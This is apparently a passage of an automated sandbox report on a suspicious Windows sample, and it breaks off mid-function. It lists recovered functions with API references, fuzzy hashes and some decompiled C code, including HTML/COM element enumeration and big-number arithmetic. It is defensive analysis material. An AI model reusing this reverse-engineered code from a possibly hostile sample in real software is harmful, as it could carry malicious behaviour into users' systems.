0x02c95e24
0x02c95e2d
0x02c95e2f
0x02c95e33
0x02c95e39

APIs

RtlEnterCriticalSection.NTDLL(05149570), ref: 02C95DE6
Sleep.KERNEL32(0000000A,?,02C95D85), ref: 02C95DF0
HeapFree.KERNEL32(00000000,?,?,02C95D85), ref: 02C95E1E
RtlLeaveCriticalSection.NTDLL(05149570), ref: 02C95E33

Strings

Uxt, xrefs: 02C95E1E

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Uxt
API String ID: 58946197-1536154274
Opcode ID: c05d81b165cf5b6f75948d4958f4e2f3e9b603a8235cf601e9978da4a8a1ccf7
Instruction ID: 6e65577899c88a99520f3bb99e182cd03ce1a45c5c13b8ff551c21a39f98bf19
Opcode Fuzzy Hash: c05d81b165cf5b6f75948d4958f4e2f3e9b603a8235cf601e9978da4a8a1ccf7
Instruction Fuzzy Hash: 69F0DAB4E801809BEB19DF78D99DB1677F4EB48741B445A0AEA07D7250C735A960CA24

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AD370, Relevance: 7.6, APIs: 5, Instructions: 149COMMON

Download Yara Rule

APIs

UnDecorator::doMSKeywords.LIBCMTD ref: 6E1AD3BE
Mailbox.LIBCMTD ref: 6E1AD52F
DName::DName.LIBVCRUNTIMED ref: 6E1AD3B9

Part of subcall function 6E1A9110: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E1A916E

DName::DName.LIBVCRUNTIMED ref: 6E1AD540
DName::DName.LIBVCRUNTIMED ref: 6E1AD551

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Name$Name::$Decorator::doKeywordsMailboxNode::makeStatus
String ID:
API String ID: 2417761376-0
Opcode ID: 8fdf34b7ead60d18a43bf3e4755d7b514738e554c226ff0478749c96352c985e
Instruction ID: 82df4e13d1a1c2fe4098583019692984bedf31c35374fff7a6d404fa1d0b84c8
Opcode Fuzzy Hash: 8fdf34b7ead60d18a43bf3e4755d7b514738e554c226ff0478749c96352c985e
Instruction Fuzzy Hash: 955141F9C402089ECF04DFECE951AFD7BF5AF15309F14846AE6066A181E7325A84DF52

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B3330, Relevance: 7.6, APIs: 5, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B333C

Part of subcall function 6E1B40B0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B40B9
Part of subcall function 6E1B40B0: UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 6E1B4116
Part of subcall function 6E1B40B0: operator+.LIBVCRUNTIMED ref: 6E1B4127
Part of subcall function 6E1B40B0: Mailbox.LIBCMTD ref: 6E1B4133
Part of subcall function 6E1B40B0: Mailbox.LIBCMTD ref: 6E1B4225

Mailbox.LIBCMTD ref: 6E1B33A3
DName::length.LIBVCRUNTIMED ref: 6E1B33BF
DName::getString.LIBCMTD ref: 6E1B33FB

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Mailbox$Iterator_baseIterator_base::_std::_$DecoratedDecorator::getNameName::getName::lengthStringoperator+
String ID:
API String ID: 245642696-0
Opcode ID: b630ad8f0397ae284e4fce6d571c3e2c5e3207ec6a016759676a7c314b10fc70
Instruction ID: 13ba538001ee057e675855f8920c7d9de9676ced03808726678144f835e45c29
Opcode Fuzzy Hash: b630ad8f0397ae284e4fce6d571c3e2c5e3207ec6a016759676a7c314b10fc70
Instruction Fuzzy Hash: A141ED75D04208EFCB05CFE8D4A0AEEBBB5AF59304F24C099D951AB350DB31AAC6DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A2D80, Relevance: 7.6, APIs: 5, Instructions: 62COMMON

Download Yara Rule

APIs

___scrt_acquire_startup_lock.LIBCMTD ref: 6E1A2DDB
___scrt_fastfail.LIBCMTD ref: 6E1A2DF5
___scrt_dllmain_uninitialize_c.LIBCMTD ref: 6E1A2DFA
__RTC_Initialize.LIBCMTD ref: 6E1A2E04
___scrt_uninitialize_crt.LIBCMTD ref: 6E1A2E36

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Initialize___scrt_acquire_startup_lock___scrt_dllmain_uninitialize_c___scrt_fastfail___scrt_uninitialize_crt
String ID:
API String ID: 485910261-0
Opcode ID: 64094edb1897cb416a5a4b0e28b90187705f9216498db623d44567ad35bd1c44
Instruction ID: 37a866828f1efd68f11a9f238eec8b71e20c7857a0318e410c20b694b7d627b3
Opcode Fuzzy Hash: 64094edb1897cb416a5a4b0e28b90187705f9216498db623d44567ad35bd1c44
Instruction Fuzzy Hash: 4521C079508659DFDB00CFEEC9487EEBBB9FB02319F004659D2059B280DB754584EBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AEE30, Relevance: 7.6, APIs: 5, Instructions: 52COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1AEE53
DName::operator+.LIBCMTD ref: 6E1AEE92
DName::operator+.LIBCMTD ref: 6E1AEEA5
Mailbox.LIBCMTD ref: 6E1AEEAE
Mailbox.LIBCMTD ref: 6E1AEEBA

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: MailboxName::operator+$Iterator_baseIterator_base::_std::_
String ID:
API String ID: 2657989147-0
Opcode ID: 308c9df5f0253f42658c33754e85cd6bf0b14cec1cbf8b35c0bbf3f76a903c90
Instruction ID: a4c6a3425b6c902a952dbea05f5df6c5943015021e0bfae7e9bd5fb6df493173
Opcode Fuzzy Hash: 308c9df5f0253f42658c33754e85cd6bf0b14cec1cbf8b35c0bbf3f76a903c90
Instruction Fuzzy Hash: A711F1B9D0020CAFCB04DFE8D951BEEB7BDAB44204F108569E615A7280EB316B84DB91

Uniqueness

Uniqueness Score: -1.00%

Function 02C95722, Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E02C95722(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E02C98389(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E02C9A961(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x2c9d12c() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x02c95722
0x02c9572f
0x02c95731
0x02c95794
0x00000000
0x02c95794
0x02c95749
0x02c95750
0x02c9575c
0x02c95761
0x02c95763
0x02c95765
0x02c95767
0x02c95769
0x02c9576b
0x02c95777
0x02c95787
0x00000000
0x02c95779
0x02c95779
0x02c95780
0x02c9578d
0x02c9578d
0x02c9578d
0x02c95780
0x02c95777
0x02c95792
0x00000000
0x00000000
0x02c95798

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,02C96187,?,?,00000000,00000000), ref: 02C9575C
ResetEvent.KERNEL32(?), ref: 02C95761
GetLastError.KERNEL32 ref: 02C95779
GetLastError.KERNEL32(?,?,00000102,02C96187,?,?,00000000,00000000), ref: 02C95794

Part of subcall function 02C98389: lstrlen.KERNEL32(00000000,00000008,?,74784D40,?,?,02C95741,?,?,?,?,00000102,02C96187,?,?,00000000), ref: 02C98395
Part of subcall function 02C98389: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02C95741,?,?,?,?,00000102,02C96187,?), ref: 02C983F3
Part of subcall function 02C98389: lstrcpy.KERNEL32(00000000,00000000), ref: 02C98403

SetEvent.KERNEL32(?), ref: 02C95787

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
String ID:
API String ID: 1449191863-0
Opcode ID: 2b533c751a01d5dd89fd4977869ee482d949025f840955c236ce5e8387e2fecb
Instruction ID: 0660da4e7fa190ec1ed3f4983a58a01906f6679013e356557cab11e578fe5121
Opcode Fuzzy Hash: 2b533c751a01d5dd89fd4977869ee482d949025f840955c236ce5e8387e2fecb
Instruction Fuzzy Hash: C8016D31110201EFDF326B71DC8CF1BBAA9BF897A8F510B25F652A10E0D732D624DA60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E3F90, Relevance: 7.5, APIs: 5, Instructions: 43libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(6E1E3E89,00000000,00000800,?,?,6E1E3E89,00000000), ref: 6E1E3FA1
GetLastError.KERNEL32(?,?,6E1E3E89), ref: 6E1E3FB5
_wcsncmp.LIBCMTD ref: 6E1E3FCB
_wcsncmp.LIBCMTD ref: 6E1E3FE2
LoadLibraryExW.KERNEL32(6E1E3E89,00000000,00000000,?,?,?,?,6E1E3E89), ref: 6E1E3FF6

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: LibraryLoad_wcsncmp$ErrorLast
String ID:
API String ID: 180994465-0
Opcode ID: f1476b15536c38f48c1e95efc6aea89600e24517b1e7332a86f27cd38a83624d
Instruction ID: c866c88b98091af971d8d31e7f41398992ad9c70deeb44b25ad3f3494f5aba32
Opcode Fuzzy Hash: f1476b15536c38f48c1e95efc6aea89600e24517b1e7332a86f27cd38a83624d
Instruction Fuzzy Hash: 7A01AD70A0420DFBEB249AE1DD4AF9E367B9B51700F204814FA099B2C4DA71DA84D7E0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AC7F0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 6E1A9E20: UnDecorator::doUnderScore.LIBCMTD ref: 6E1A9E26

DName::DName.LIBVCRUNTIMED ref: 6E1AC892
DName::operator+=.LIBCMTD ref: 6E1AC8A3
Mailbox.LIBCMTD ref: 6E1AC8D0

Strings

5, xrefs: 6E1AC84B

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Decorator::doMailboxNameName::Name::operator+=ScoreUnder
String ID: 5
API String ID: 3298578019-2226203566
Opcode ID: 507d3291da086951102ea6027dc6b5386e85ad6c0d9f7debb2cf9e74809f3aa1
Instruction ID: 3300ffa2bb42fd1d8c1bf624d2eed62fc49fd7bb2cf5929eb0cf9eaa2a777ec3
Opcode Fuzzy Hash: 507d3291da086951102ea6027dc6b5386e85ad6c0d9f7debb2cf9e74809f3aa1
Instruction Fuzzy Hash: E621A078C40209EFCB04CFE8E9609FEBBB4BF05304F008569E6056B280E7311AC0DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A6D10, Relevance: 6.2, APIs: 4, Instructions: 211COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMTD ref: 6E1A6E13
___AdjustPointer.LIBCMTD ref: 6E1A6E5D
___AdjustPointer.LIBCMTD ref: 6E1A6F0F
___AdjustPointer.LIBCMTD ref: 6E1A6EC7

Part of subcall function 6E1BD290: IsProcessorFeaturePresent.KERNEL32(00000017,?,?,6E1DC799,?,?,6E1B5367,?), ref: 6E1BD2D2

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: AdjustPointer$FeaturePresentProcessor
String ID:
API String ID: 3874303849-0
Opcode ID: 50b1790594710c950759b1ee959f5e38e86446147aa2f32742c1f9e68b94e4d2
Instruction ID: 20afbc00f2018502a5cfe84a6957df6fd7d42443a4c96569b3a8122941b8e962
Opcode Fuzzy Hash: 50b1790594710c950759b1ee959f5e38e86446147aa2f32742c1f9e68b94e4d2
Instruction Fuzzy Hash: 92911C78A1020ADFCB45CF9CD494BAAB7B6FB59305F208459E9155B390C735EC81DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02C95E3C, Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E02C95E3C(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x2c9d2a4; // 0x24aa5a8
					_t5 = _t103 + 0x2c9e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x2c9c2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x2c9d2a4; // 0x24aa5a8
												_t28 = _t109 + 0x2c9e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x2c9d2a4; // 0x24aa5a8
														_t33 = _t79 + 0x2c9e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x02c95e41
0x02c95e4a
0x02c95e4b
0x02c95e4f
0x02c95e55
0x02c95e5b
0x02c95e64
0x02c95e6a
0x02c95e74
0x02c95e76
0x02c95e7c
0x02c95e81
0x02c95e8c
0x02c95e92
0x02c95e97
0x02c95fb9
0x02c95e9d
0x02c95e9d
0x02c95eaa
0x02c95eb0
0x02c95eb6
0x02c95eba
0x02c95ec0
0x02c95ecd
0x02c95ed1
0x02c95ed7
0x02c95eda
0x02c95ee2
0x02c95ee3
0x02c95ee7
0x02c95eeb
0x02c95eee
0x02c95ef1
0x02c95ef7
0x02c95f00
0x02c95f06
0x02c95f07
0x02c95f0a
0x02c95f0b
0x02c95f0c
0x02c95f14
0x02c95f15
0x02c95f16
0x02c95f18
0x02c95f1c
0x02c95f20
0x00000000
0x00000000
0x02c95f26
0x02c95f2f
0x02c95f35
0x02c95f3f
0x02c95f43
0x02c95f45
0x02c95f52
0x02c95f56
0x02c95f5e
0x02c95f63
0x02c95f75
0x02c95f77
0x02c95f7d
0x02c95f7d
0x02c95f86
0x02c95f86
0x02c95f88
0x02c95f8e
0x02c95f8e
0x02c95f91
0x02c95f97
0x02c95f9a
0x02c95fa3
0x00000000
0x00000000
0x00000000
0x02c95fa3
0x02c95ef7
0x02c95ef1
0x02c95eda
0x02c95fa9
0x02c95fa9
0x02c95faf
0x02c95faf
0x02c95fb5
0x02c95fb5
0x02c95fbe
0x02c95fc4
0x02c95fc4
0x02c95e81
0x02c95fcd

APIs

SysAllocString.OLEAUT32(02C9C2B0), ref: 02C95E8C
lstrcmpW.KERNEL32(00000000,0076006F), ref: 02C95F6D
SysFreeString.OLEAUT32(00000000), ref: 02C95F86
SysFreeString.OLEAUT32(?), ref: 02C95FB5

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 95a2b46dd0214a44093b10b0841f55ab943a0950fda58a57f5e27478c179bd52
Instruction ID: 89c42f38f09ed02ed1c9533114d6661f71f16d0f0b9a228c8b66101cb0f068a6
Opcode Fuzzy Hash: 95a2b46dd0214a44093b10b0841f55ab943a0950fda58a57f5e27478c179bd52
Instruction Fuzzy Hash: 87516175D00509EFCF01DFA8C8889AEF7BAEF88754B144595E905EB210D7329E41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02C95349, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 02C95384
SysFreeString.OLEAUT32(00000000), ref: 02C95469

Part of subcall function 02C95E3C: SysAllocString.OLEAUT32(02C9C2B0), ref: 02C95E8C

SafeArrayDestroy.OLEAUT32(00000000), ref: 02C954BC
SysFreeString.OLEAUT32(00000000), ref: 02C954CB

Part of subcall function 02C96872: Sleep.KERNEL32(000001F4), ref: 02C968BA

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: fbb9980d16e6ded595b3c02abd98ecd718393cbbb11f9b6f4734fcae005f045b
Instruction ID: c3b06e2054f06d247ae4534f5b813e42441036270b22d68817d85c0c35b8f923
Opcode Fuzzy Hash: fbb9980d16e6ded595b3c02abd98ecd718393cbbb11f9b6f4734fcae005f045b
Instruction Fuzzy Hash: E3517035900609AFDF42DFA8C848A9EB7BAFF89755F148829E905EB250DB31DE05CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02C98D85, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E02C98D85(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E02C98483(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E02C9A60F(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E02C92215(_t101,  &_v236, _a8, _t96 - _t81);
					E02C92215(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E02C9A60F(_t101, 0x2c9d1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E02C9A60F(_a16, _a4);
						E02C9A624(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L02C9B078();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L02C9B072();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E02C94607(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E02C95151(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E02C96911(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x2c9d1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x02c98d88
0x02c98d94
0x02c98d9a
0x02c98d9f
0x02c98da3
0x02c98f00
0x02c98f04
0x02c98f04
0x02c98da9
0x02c98dad
0x02c98db1
0x02c98db4
0x02c98dbf
0x02c98dc5
0x02c98dca
0x02c98dcd
0x02c98de7
0x02c98df3
0x02c98dfc
0x02c98e06
0x02c98e0b
0x02c98e0d
0x02c98e10
0x02c98ebe
0x02c98ec4
0x02c98ed5
0x02c98ee8
0x02c98ef8
0x00000000
0x02c98efd
0x02c98e19
0x02c98e20
0x02c98e24
0x02c98e2a
0x02c98e2c
0x02c98e2e
0x02c98e30
0x02c98e32
0x02c98e3c
0x02c98e41
0x02c98e43
0x02c98e45
0x02c98e46
0x02c98e47
0x02c98e48
0x02c98e4f
0x02c98e56
0x02c98e59
0x02c98e59
0x02c98e26
0x02c98e26
0x02c98e26
0x02c98e61
0x02c98e69
0x02c98e72
0x02c98e77
0x02c98e77
0x02c98e7c
0x00000000
0x00000000
0x02c98e7e
0x02c98e81
0x02c98e8b
0x00000000
0x00000000
0x02c98e8d
0x02c98e8d
0x02c98e97
0x02c98e77
0x02c98e7c
0x00000000
0x00000000
0x00000000
0x02c98e7c
0x02c98ea1
0x02c98ea4
0x02c98ea7
0x02c98eae
0x02c98eae
0x02c98ebb
0x00000000
0x02c98ebb
0x02c98db6
0x02c98dba
0x02c98dbb
0x02c98dbd
0x00000000
0x00000000
0x00000000
0x02c98dbd
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 02C98E32
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 02C98E48
memset.NTDLL ref: 02C98EE8
memset.NTDLL ref: 02C98EF8

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 6913d9280d6004822527a2074670d7db4f16fc9eb4b0995b6f70f50d5b114b0e
Instruction ID: fb4498df8e005df62f17ffe39f1e1217fad3e0338b5eff51073addc2b8de073c
Opcode Fuzzy Hash: 6913d9280d6004822527a2074670d7db4f16fc9eb4b0995b6f70f50d5b114b0e
Instruction Fuzzy Hash: 1241C372A00259ABDF10DFA9DC48BEE7779EF46710F008629F916A7280DB709E449F90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E4FC0, Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f74caf813377549422acdd099a6f1211482d1d54063982cde928a7be88c144c1
Instruction ID: e8cac8a7161596f31dd6214fd9db8b3c57bf19fe339fd8ea42b294ec48ce35ac
Opcode Fuzzy Hash: f74caf813377549422acdd099a6f1211482d1d54063982cde928a7be88c144c1
Instruction Fuzzy Hash: BB315230A10509EFDB54DFE4D854BEE77B9AF44304F208928F5159B694DB70AEC0EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E23F0, Relevance: 6.1, APIs: 4, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e6f65eddbd1a4219ceaaf29dd1215652a2c54bdfc66b32a18abc44c621df873
Instruction ID: cd9806a68a5e54ee59037fa1143ce52818100b7c1667aac0794101aa19c4b222
Opcode Fuzzy Hash: 4e6f65eddbd1a4219ceaaf29dd1215652a2c54bdfc66b32a18abc44c621df873
Instruction Fuzzy Hash: 35314E70A0090AEFDB04DFE4D974BDE77B9AF44305F208928F4159B694EB70AE80EB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E5100, Relevance: 6.1, APIs: 4, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47e00ee25bb32bc5527d248406d92b2ba71ef307ce3415816b27fabb601b11b8
Instruction ID: f9dbafee7d67c69acc224c8baf7d4f19d3152f8ac51d52b3def4024f630bdb20
Opcode Fuzzy Hash: 47e00ee25bb32bc5527d248406d92b2ba71ef307ce3415816b27fabb601b11b8
Instruction Fuzzy Hash: 45313E34A1050AEFDB44DFE8D854BDE77BAAF44348F108928F5159B694DB70AEC0EB50

Uniqueness

Uniqueness Score: -1.00%

Function 02C98C8E, Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E02C98C8E(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x2c9d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
